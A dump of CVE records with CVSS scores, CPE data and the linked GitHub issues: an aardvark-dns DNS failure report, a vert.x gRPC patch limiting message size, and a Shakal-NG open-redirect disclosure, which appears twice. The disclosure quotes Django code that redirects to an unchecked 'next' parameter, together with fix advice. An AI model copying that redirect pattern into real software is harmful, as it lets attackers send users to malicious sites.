[ { "source": "secalert@redhat.com", "tags": [ "Third Party Advisory" ], "url": "https://access.redhat.com/security/cve/CVE-2024-8418" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2309683" }, { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/containers/aardvark-dns/issues/500" }, { "source": "secalert@redhat.com", "tags": [ "Issue Tracking" ], "url": "https://github.com/containers/aardvark-dns/pull/503" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:containers:aardvark-dns:1.12.0:*:*:*:*:*:*:*", "matchCriteriaId": "500D2E84-A5C1-452D-92B3-5F72EA9A3B65", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:containers:aardvark-dns:1.12.1:*:*:*:*:*:*:*", "matchCriteriaId": "B571A31D-435C-4048-8F0B-06502F177D7C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "400" ]
400
https://github.com/containers/aardvark-dns/issues/500
[ "Exploit", "Issue Tracking" ]
github.com
[ "containers", "aardvark-dns" ]
### Issue Description The issue I have is that my podman containers stops resolving internal & external DNS after some time ~1h. If I restart whole podman or reboot system I can resolve all of the dns records and ping between containers or external network. After ~1h I can no longer resolve dns, or ping between containers, or outside network. I'm running named bridge network. **Issue started to show up after upgrade from podman 5:5.1.2-1.fc40 -> 5:5.2.1-1.fc40 & maybe what's most important netavark 1.11.0-1.fc40 -> 2:1.12.1-1.fc40 aardvark-dns 1.11.0-1.fc40 -> 2:1.12.1-1.fc40** ### Steps to reproduce the issue Steps to reproduce the issue 1. Start the system 2. compose up containers 3. after ~1h no longer able to ping between containers ### Describe the results you received Right after container start: ``` DNS Check: root@ca958a38fca0:/# nslookup gitea Server: 10.89.0.1 Address: 10.89.0.1:53 Non-authoritative answer: Name: gitea.dns.podman Address: 10.89.0.8 Name: gitea.dns.podman Address: 10.89.0.8 Non-authoritative answer: root@ca958a38fca0:/# ping gitea PING gitea (10.89.0.8): 56 data bytes 64 bytes from 10.89.0.8: seq=0 ttl=42 time=0.106 ms 64 bytes from 10.89.0.8: seq=1 ttl=42 time=0.148 ms ^C --- gitea ping statistics --- 2 packets transmitted, 2 packets received, 0% packet loss round-trip min/avg/max = 0.106/0.127/0.148 ms ``` After 1h ``` root@f7e795eac0a0:/# nslookup gitea ;; connection timed out; no servers could be reached root@f7e795eac0a0:/# ping google.com ping: bad address 'google.com' root@f7e795eac0a0:/# ``` Journalctl contains following entries: ``` Aug 27 16:56:59 Nighthawk systemd[1]: Started run-rf52e2a5ee0fb4ca9916ea051963e2963.scope - /usr/libexec/podman/aardvark-dns --config /run/containers/networks/aardvark-dns -p 53 run. Aug 27 17:13:44 Nighthawk aardvark-dns[1377]: 45306 dns request got empty response Aug 27 21:57:59 Nighthawk aardvark-dns[1377]: No configuration found stopping the sever Aug 27 22:02:36 Nighthawk systemd[1]: Started run-r7e803c9914cd438983b19242454a19a2.scope - /usr/libexec/podman/aardvark-dns --config /run/containers/networks/aardvark-dns -p 53 run. Aug 27 22:24:46 Nighthawk aardvark-dns[35457]: No configuration found stopping the sever Aug 27 22:25:13 Nighthawk systemd[1]: Started run-rc7f6cb4647da460c8c4bd5890036e989.scope - /usr/libexec/podman/aardvark-dns --config /run/containers/networks/aardvark-dns -p 53 run. ``` ### Describe the results you expected Network working all the time ### podman info output ```yaml host: arch: amd64 buildahVersion: 1.37.1 cgroupControllers: - cpuset - cpu - io - memory - hugetlb - pids - rdma - misc cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.10-1.fc40.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.10, commit: ' cpuUtilization: idlePercent: 98.85 systemPercent: 0.36 userPercent: 0.79 cpus: 4 databaseBackend: sqlite distribution: distribution: fedora variant: iot version: "40" eventLogger: journald freeLocks: 2009 hostname: Nighthawk idMappings: gidmap: null uidmap: null kernel: 6.10.6-200.fc40.x86_64 linkmode: dynamic logDriver: journald memFree: 28301148160 memTotal: 33379938304 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns-1.12.1-1.fc40.x86_64 path: /usr/libexec/podman/aardvark-dns version: aardvark-dns 1.12.1 package: netavark-1.12.1-1.fc40.x86_64 path: /usr/libexec/podman/netavark version: netavark 1.12.1 ociRuntime: name: crun package: crun-1.15-1.fc40.x86_64 path: /usr/bin/crun version: |- crun version 1.15 commit: e6eacaf4034e84185fd8780ac9262bbf57082278 rundir: /run/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux pasta: executable: /usr/bin/pasta package: passt-0^20240821.g1d6142f-1.fc40.x86_64 version: | pasta 0^20240821.g1d6142f-1.fc40.x86_64 Copyright Red Hat GNU General Public License, version 2 or later <https://www.gnu.org/licenses/old-licenses/gpl-2.0.html> This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. remoteSocket: exists: true path: /run/podman/podman.sock rootlessNetworkCmd: pasta security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.2-2.fc40.x86_64 version: |- slirp4netns version 1.2.2 commit: 0ee2d87523e906518d34a6b423271e4826f71faf libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.5 swapFree: 8589930496 swapTotal: 8589930496 uptime: 16h 48m 54.00s (Approximately 0.67 days) variant: "" plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io store: configFile: /usr/share/containers/storage.conf containerStore: number: 16 paused: 0 running: 15 stopped: 1 graphDriverName: overlay graphOptions: overlay.imagestore: /usr/lib/containers/storage overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphRootAllocated: 73391005696 graphRootUsed: 20967243776 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "false" Supports d_type: "true" Supports shifting: "true" Supports volatile: "true" Using metacopy: "true" imageCopyTmpDir: /var/tmp imageStore: number: 33 runRoot: /run/containers/storage transientStore: false volumePath: /var/lib/containers/storage/volumes version: APIVersion: 5.2.1 Built: 1723593600 BuiltTime: Wed Aug 14 02:00:00 2024 GitCommit: "" GoVersion: go1.22.5 Os: linux OsArch: linux/amd64 Version: 5.2.1 ``` ### Podman in a container No ### Privileged Or Rootless Privileged ### Upstream Latest Release No ### Additional environment details Running Fedora IoT 40 latest Running through compose ### Additional information Additional information like issue happens only occasionally or issue happens with a particular architecture or on a particular setting
DNS Stops working after some time in bridge network
https://api.github.com/repos/containers/aardvark-dns/issues/500/comments
12
2024-08-28T07:51:59Z
2024-09-02T13:43:32Z
https://github.com/containers/aardvark-dns/issues/500
2,491,661,448
500
6,260
CVE-2024-8391
2024-09-04T16:15:09.253
In Eclipse Vert.x version 4.3.0 to 4.5.9, the gRPC server does not limit the maximum length of message payload (Maven GAV: io.vertx:vertx-grpc-server and io.vertx:vertx-grpc-client).  This is fixed in the 4.5.10 version.  Note this does not affect the Vert.x gRPC server based grpc-java and Netty libraries (Maven GAV: io.vertx:vertx-grpc)
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "emo@eclipse.org", "type": "Secondary" } ] }
[ { "source": "emo@eclipse.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/eclipse-vertx/vertx-grpc/issues/113" }, { "source": "emo@eclipse.org", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "https://gitlab.eclipse.org/security/cve-assignement/-/issues/31" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eclipse:vert.x:*:*:*:*:*:*:*:*", "matchCriteriaId": "9A26F841-8F44-472F-B3CA-561D561DF1F4", "versionEndExcluding": "4.5.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "4.3.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "770" ]
770
https://github.com/eclipse-vertx/vertx-grpc/issues/113
[ "Issue Tracking" ]
github.com
[ "eclipse-vertx", "vertx-grpc" ]
Motivation: The gRPC message decoder uses the default limit allowed by the gRPC HTTP/2 transport (2^32 bytes). The default maximum size should be smaller and configurable. This can be used to consume memory of a server or a client and is referenced as [CVE-2024-8391](https://www.cve.org/CVERecord?id=CVE-2024-8391) Changes: Add options for configuring the maximum message size and use a lower default value (256KB) for both client and server. In addition an invalid message handler can be set on the GrpcReadStream to catch invalid message reports and let the application recover invalid messages. The invalid message handler can be triggered by a capacity overflow or a decoder exception. Results: gRPC server and client now uses a smaller default maximum message size which can be configured according to the application needs. Invalid message handler can also be set to catch invalid messages.
Set a configurable maximum payload size for the message decoder and add an invalid message handler to catch invalid messages
https://api.github.com/repos/eclipse-vertx/vertx-grpc/issues/113/comments
3
2024-09-04T14:38:04Z
2024-12-01T18:20:31Z
https://github.com/eclipse-vertx/vertx-grpc/issues/113
2,505,559,540
113
6,261
CVE-2024-8412
2024-09-04T16:15:09.393
A vulnerability, which was classified as problematic, was found in LinuxOSsk Shakal-NG up to 1.3.3. Affected is an unknown function of the file comments/views.py. The manipulation of the argument next leads to open redirect. It is possible to launch the attack remotely. The name of the patch is ebd1c2cba59cbac198bf2fd5a10565994d4f02cb. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/LinuxOSsk/Shakal-NG/commit/ebd1c2cba59cbac198bf2fd5a10565994d4f02cb" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/LinuxOSsk/Shakal-NG/issues/202" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/LinuxOSsk/Shakal-NG/issues/202#issuecomment-2325187434" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.276492" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.276492" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.400792" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxos:shakal-ng:*:*:*:*:*:*:*:*", "matchCriteriaId": "F6248D95-9207-49D3-BD21-0A8003C1F0BF", "versionEndExcluding": null, "versionEndIncluding": "1.3.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/LinuxOSsk/Shakal-NG/issues/202
[ "Exploit", "Issue Tracking" ]
github.com
[ "LinuxOSsk", "Shakal-NG" ]
The code uses the user-controlled next variable to redirect. If next is not verified, an attacker could induce users to redirect to a malicious website. First: ``` Snippets of code comments/urls.pypy (line 10) : path('odpovedat/<int:parent>/', views.Reply.as_view(), name='reply'), Snippet of code comments/views.py (lines 97 through 97) : next_url = self.request.POST.get('next', '') Snippet of code comments/views.py (lines 100 to 100) : return http.HttpResponseRedirect(next_url + '#link_' + str(comment.pk)) ``` Second: ``` Snippets of code comments/urls.pypy (line 12) : path('sledovat/<int:pk>/', views.Watch.as_view(), name='watch'), Snippets of code comments/views.py (lines 140 through 140) : def post(self, request, **kwargs): Snippets of code comments/views.py (lines 152 through 152) : return HttpResponseRedirect(request.POST['next']) ``` Third: ``` Snippets of code comments/urls.pypy (line 13) : path('zabudnut/<int:pk>/', views.Forget.as_view(), name='forget'), Snippet of code comments/views.py (lines 161 through 161) : def get(self, request, **kwargs): Snippet of code comments/views.py (lines 165 through 165) : return HttpResponseRedirect(request.GET['next']) ``` Safety advice: Verify the next parameter: Make sure that the next parameter points to a predefined, secure list of urls, or use a whitelist to limit acceptable values. Use security functions: If the Django framework is being used, consider using Django's is_safe_url or a similar method to verify the security of the URL. Encoded output: Ensure that the redirected target URL is properly encoded to prevent injection attacks. Logging: Logging relevant information prior to redirection helps in tracing and debugging in the event of a security incident. Error handling: If the next_url is invalid or points to an insecure address, there should be an explicit error handling mechanism rather than a simple redirect.
CWE-601: URL Redirection to Untrusted Site ('Open Redirect') in comments/views.py
https://api.github.com/repos/LinuxOSsk/Shakal-NG/issues/202/comments
1
2024-08-31T12:56:24Z
2024-09-02T18:32:09Z
https://github.com/LinuxOSsk/Shakal-NG/issues/202
2,498,833,346
202
6,262
CVE-2024-8412
2024-09-04T16:15:09.393
A vulnerability, which was classified as problematic, was found in LinuxOSsk Shakal-NG up to 1.3.3. Affected is an unknown function of the file comments/views.py. The manipulation of the argument next leads to open redirect. It is possible to launch the attack remotely. The name of the patch is ebd1c2cba59cbac198bf2fd5a10565994d4f02cb. It is recommended to apply a patch to fix this issue.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Patch" ], "url": "https://github.com/LinuxOSsk/Shakal-NG/commit/ebd1c2cba59cbac198bf2fd5a10565994d4f02cb" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/LinuxOSsk/Shakal-NG/issues/202" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/LinuxOSsk/Shakal-NG/issues/202#issuecomment-2325187434" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.276492" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.276492" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?submit.400792" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:linuxos:shakal-ng:*:*:*:*:*:*:*:*", "matchCriteriaId": "F6248D95-9207-49D3-BD21-0A8003C1F0BF", "versionEndExcluding": null, "versionEndIncluding": "1.3.3", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "601" ]
601
https://github.com/LinuxOSsk/Shakal-NG/issues/202#issuecomment-2325187434
[ "Exploit", "Issue Tracking" ]
github.com
[ "LinuxOSsk", "Shakal-NG" ]
The code uses the user-controlled next variable to redirect. If next is not verified, an attacker could induce users to redirect to a malicious website. First: ``` Snippets of code comments/urls.pypy (line 10) : path('odpovedat/<int:parent>/', views.Reply.as_view(), name='reply'), Snippet of code comments/views.py (lines 97 through 97) : next_url = self.request.POST.get('next', '') Snippet of code comments/views.py (lines 100 to 100) : return http.HttpResponseRedirect(next_url + '#link_' + str(comment.pk)) ``` Second: ``` Snippets of code comments/urls.pypy (line 12) : path('sledovat/<int:pk>/', views.Watch.as_view(), name='watch'), Snippets of code comments/views.py (lines 140 through 140) : def post(self, request, **kwargs): Snippets of code comments/views.py (lines 152 through 152) : return HttpResponseRedirect(request.POST['next']) ``` Third: ``` Snippets of code comments/urls.pypy (line 13) : path('zabudnut/<int:pk>/', views.Forget.as_view(), name='forget'), Snippet of code comments/views.py (lines 161 through 161) : def get(self, request, **kwargs): Snippet of code comments/views.py (lines 165 through 165) : return HttpResponseRedirect(request.GET['next']) ``` Safety advice: Verify the next parameter: Make sure that the next parameter points to a predefined, secure list of urls, or use a whitelist to limit acceptable values. Use security functions: If the Django framework is being used, consider using Django's is_safe_url or a similar method to verify the security of the URL. Encoded output: Ensure that the redirected target URL is properly encoded to prevent injection attacks. Logging: Logging relevant information prior to redirection helps in tracing and debugging in the event of a security incident. Error handling: If the next_url is invalid or points to an insecure address, there should be an explicit error handling mechanism rather than a simple redirect.
CWE-601: URL Redirection to Untrusted Site ('Open Redirect') in comments/views.py
https://api.github.com/repos/LinuxOSsk/Shakal-NG/issues/202/comments
1
2024-08-31T12:56:24Z
2024-09-02T18:32:09Z
https://github.com/LinuxOSsk/Shakal-NG/issues/202
2,498,833,346
202
6,263
CVE-2024-8567
2024-09-08T02:15:10.643
A vulnerability, which was classified as critical, has been found in itsourcecode Payroll Management System 1.0. This issue affects some unknown processing of the file /ajax.php?action=delete_deductions. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
